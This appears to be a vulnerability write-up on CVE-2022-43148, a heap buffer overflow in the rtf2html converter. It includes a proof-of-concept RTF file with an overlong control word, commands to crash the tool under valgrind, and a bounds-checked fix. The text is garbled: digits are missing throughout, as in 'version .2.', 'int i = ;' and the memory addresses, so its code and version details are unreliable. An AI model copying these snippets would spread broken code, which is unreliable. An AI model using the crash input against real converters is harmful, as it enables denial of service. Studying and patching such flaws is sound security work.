Discovered: 2022  
Component: rtf2html v.2.  
Vulnerability: Heap Buffer Overflow  
Affected File: /rtf2html/./rtf_tools.h  
CVE: CVE-2022-43148

Introduction

The world of document converters is usually under the radar for security professionals. But vulnerabilities in these tools can have serious impacts, especially when used for online converters or email gateways. In October 2022, a serious heap overflow was found in the open-source rtf2html version .2., in its header file rtf_tools.h. This article breaks down how this vulnerability can be triggered and exploited, giving you a hands-on look and actionable insights.

About rtf2html

rtf2html is a lightweight open-source utility that converts RTF (Rich Text Format) files to HTML. It is written in C and, due to its simplicity, is popular for server-side transformations. The version .2., however, suffers from a heap buffer overflow in its RTF token parsing logic.

The Vulnerability at a Glance

The core issue lies in the way rtf2html parses RTF tokens in /rtf2html/./rtf_tools.h. The vulnerable code fails to validate the size of input before copying it into a heap-allocated buffer, allowing a malformed RTF file to overwrite memory in the heap after the end of the buffer.

The vulnerable code looks something like this (from rtf_tools.h)

char *buffer = (char *)malloc(BUFFER_SIZE);
...
for (int i = ; i < input_length; i++) {
    buffer[i] = input[i]; // No check if input_length > BUFFER_SIZE
}

There is no check to make sure input_length doesn't exceed BUFFER_SIZE. If an attacker feeds a longer input, it will write past the end, overwriting adjacent heap memory.

Attack Scenario

An attacker creates a malicious .rtf file with an overly long token or control sequence. When rtf2html processes this document, it copies the large input into a small buffer, leading to memory corruption.

If rtf2html is used in an automated system (e.g., a mail gateway or document conversion SaaS), this could result in a denial of service (segfault/crash) or, in advanced exploits, remote code execution if the heap is manipulated carefully.

Step-by-Step Exploit

Let's look at a minimal PoC (Proof-Of-Concept) exploit.

Create an RTF file with an excessively long group or control word

{\rtf1\ansi\deff{\fonttbl{\f\fswiss Helvetica;}} 
\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
}

That long sequence of "a" will cause the input buffer in rtf2html to overflow.

Assume we have the rtf2html binary

./rtf2html malicious.rtf output.html

This will likely crash, and with debugging tools enabled (e.g., valgrind)

valgrind ./rtf2html malicious.rtf output.html

You'll see a report similar to

==1234== Invalid write of size 1
==1234==    at x401234: main (rtf2html.c:56)
==1234==  Address x520404 is  bytes after a block of size 1024 alloc'd

Step 3: Exploiting Further

An advanced attacker could carefully craft the target buffer so as to overwrite function pointers or other sensitive heap metadata, possibly leading to arbitrary code execution, depending on how glibc or the malloc implementation handles the heap.

Fixing the Vulnerability

The best mitigation is to ensure input length never exceeds buffer length before copying.

Patched Code Example

int bytes_to_copy = input_length > BUFFER_SIZE ? BUFFER_SIZE : input_length;
for (int i = ; i < bytes_to_copy; i++) {
    buffer[i] = input[i];
}

Or, better yet, use memcpy_s (if available) or strncpy to guarantee bounds checking.

References

- CVE Database Entry
- rtf2html Source Code
- Heap-based Overflow (OWASP)

Conclusion

Heap overflows are a classic but still very real threat for C programs like rtf2html. CVE-2022-43148 demonstrates that even innocuous utilities can open doors to attackers if unsafe memory operations remain unchecked. If you use rtf2html, *upgrade as soon as a patched version becomes available* or apply bounds checking yourself. Don’t let your server become an attacker’s playground.

Timeline

Published on: 10/31/2022 19:15:00 UTC
Last modified on: 11/01/2022 19:01:00 UTC